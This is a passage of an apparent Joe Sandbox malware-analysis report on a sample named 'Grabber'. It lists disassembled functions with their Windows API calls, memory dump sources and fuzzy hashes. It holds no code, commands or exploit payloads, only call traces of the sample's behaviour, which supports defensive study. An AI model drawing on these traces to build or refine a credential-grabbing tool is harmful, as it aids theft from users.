                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                                                                                                                                                                                                                          • String ID: sysnative
                                                                                                                                                                                                                          • API String ID: 3406704365-821172135
                                                                                                                                                                                                                          • Opcode ID: e5455a9928b97281f132b1c2dd1bbabf065e779dbb70284d860f41b952fb8df8
                                                                                                                                                                                                                          • Instruction ID: 2364f58bb10a159e0aa11294c57d56a9f179ba7a21fd77f55822fae8b4f54734
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5455a9928b97281f132b1c2dd1bbabf065e779dbb70284d860f41b952fb8df8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5514075518701AAD600BBB2CC82B2F76A9AFD0709F10CC3FF544790D2CA7CD8599A6E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040D855,0041861C,0040D9E2,00000000,FFFFFFED,00000200,76EC5E70,00409E76,FFFFFFED,00000010), ref: 0040DA51
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040DA66
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DA81
                                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040DA90
                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DAA2
                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040DAB5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                                                                                                                                                                                                                          • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                                                                                                                                                                                          • API String ID: 2918862794-1339284965
                                                                                                                                                                                                                          • Opcode ID: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
                                                                                                                                                                                                                          • Instruction ID: e7d3430369b103de8e34323ddaa6381870798cc52ac97d2691a1b23ef8b22f52
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A701B132748204BAD7116FE49C49FEB3B29EF42762F10813AF905A11C0DB7C49458A6D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040951F
                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00409526
                                                                                                                                                                                                                            • Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00409543
                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00409550
                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0040955E
                                                                                                                                                                                                                          • IsWindowEnabled.USER32(?), ref: 00409569
                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000000), ref: 00409579
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3383493704-0
                                                                                                                                                                                                                          • Opcode ID: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
                                                                                                                                                                                                                          • Instruction ID: 9be2ebae674c1fa36b8fc713cd4e728ef3198b0ad07c7790c0b3041e5f2a4f9d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A901B9315083016FD3215B769C88AABBAB8AF55750B04C03EF456D3191D7749C40C66D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00408EED
                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
                                                                                                                                                                                                                          • GetWindowTextLengthW.USER32 ref: 00408F0A
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00408F1F
                                                                                                                                                                                                                          • GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00408F3D
                                                                                                                                                                                                                          • UnregisterClassW.USER32 ref: 00408F53
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2895088630-0
                                                                                                                                                                                                                          • Opcode ID: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
                                                                                                                                                                                                                          • Instruction ID: dcdd979020c5d84d31bdac08dec077088d7257a56d77306a58cab45369b049af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C611183110810ABFCB116F64ED4C9E63F76EB08361B00C53AF44592AB0CF359955EB58
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnumWindows.USER32(00409507,?), ref: 0040959B
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004095B3
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004095EF
                                                                                                                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00409605
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CurrentThread$EnableEnumWindows
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2527101397-0
                                                                                                                                                                                                                          • Opcode ID: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
                                                                                                                                                                                                                          • Instruction ID: f5a6386b144a933a28a8080deaf79be6790ca9cb7a06763c23f847dded1acd22
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E11AF32548741BBD7324B16EC48F577BB9EB81B20F14CA3EF052226E1DB766D44CA18
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D378
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D38C
                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D399
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3B0
                                                                                                                                                                                                                          • HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3BF
                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3CE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocValue$Heap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2472784365-0
                                                                                                                                                                                                                          • Opcode ID: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
                                                                                                                                                                                                                          • Instruction ID: 1e11015e4a25d7f5304c1c18fd55a95fd758b035f13ce6db6bcec7fc4f8c26ab
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22116372A45310AFD7109FA5EC84A967BA9FB58760B05803EF904D33B2DB359C048AAC
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • UnregisterWait.KERNEL32(?), ref: 0041200E
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0041218A,?), ref: 00412017
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412023
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412048
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,0041218A,?), ref: 00412066
                                                                                                                                                                                                                          • HeapFree.KERNEL32(?,?,?,?,?,0041218A,?), ref: 00412078
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4204870694-0
                                                                                                                                                                                                                          • Opcode ID: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
                                                                                                                                                                                                                          • Instruction ID: 90751bbfb1e58074f86cd24fa3ef9024ec02ad1f71581e15228f0d3cd8da5416
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5012970201601EFC7249F11EE88A96BF75FF493557108539E61AC2A70C731A821DBA8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcsncmp.MSVCRT ref: 00405853
                                                                                                                                                                                                                          • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
                                                                                                                                                                                                                          • wcsncpy.MSVCRT ref: 004058F9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memmovewcsncmpwcsncpy
                                                                                                                                                                                                                          • String ID: $0A$$0A
                                                                                                                                                                                                                          • API String ID: 1452150355-167650565
                                                                                                                                                                                                                          • Opcode ID: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
                                                                                                                                                                                                                          • Instruction ID: fc6078814c183f32d07ee1b1bbfb59dc2b99a9263d9aed9d6ca5449e395b5937
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C31D536904B058BC720FF55888057B77A8EE84344F14893EEC85373C2EB799D61DBAA
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00405562
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcmemset
                                                                                                                                                                                                                          • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 3137504439-1489217083
                                                                                                                                                                                                                          • Opcode ID: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
                                                                                                                                                                                                                          • Instruction ID: 30d66d9a54b09ec8b40df40bafdfba1d8cbaec4fc0a5d0b23e6a41b72964e000
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAE09A3176461176C6202B76AC09FCB2AACDF8AB01B14043AB105E21C5E63C8A018ABD
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A0AB
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?,00403C62), ref: 0040A0C1
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A0CC
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A0FA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeapmemsetwcscpywcslen
                                                                                                                                                                                                                          • String ID: $0A
                                                                                                                                                                                                                          • API String ID: 1807340688-513306843
                                                                                                                                                                                                                          • Opcode ID: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
                                                                                                                                                                                                                          • Instruction ID: f5e08f91bfd61cb5ee80f18050d08b7446549b79f9f251a776f81db7a0f8ced7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED212431100B04AFC321AF259845B2BB7F9EF88314F14453FFA8562692DB39A8158B1A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
                                                                                                                                                                                                                            • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
                                                                                                                                                                                                                            • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
                                                                                                                                                                                                                            • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E9C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Free$Alloc
                                                                                                                                                                                                                          • String ID: $0A
                                                                                                                                                                                                                          • API String ID: 3901518246-513306843
                                                                                                                                                                                                                          • Opcode ID: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
                                                                                                                                                                                                                          • Instruction ID: e0ba865afb0c504cde721ebe6402ca52a8b9bc1920db32d4218675ac1f34fbd8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC213971600616ABD320DF2ADC01B46BBE9BF88710F41852AB548A76A1DB71EC248BD8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02199F70), ref: 004054AB
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                                                                                                                                                                                                                            • Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3708593966-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF
                                                                                                                                                                                                                            • Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D9C8
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D9D7
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3171405041-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                                                                                                                                                                                                            • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02190000,00000000,?,?), ref: 0040E2C7
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                                                                                                                                                                                                                          • wcscmp.MSVCRT ref: 004096C2
                                                                                                                                                                                                                          • memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocFileHeapModuleNameValuememmovewcscmp
                                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                                          • API String ID: 3734239354-4282027825
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B2D7
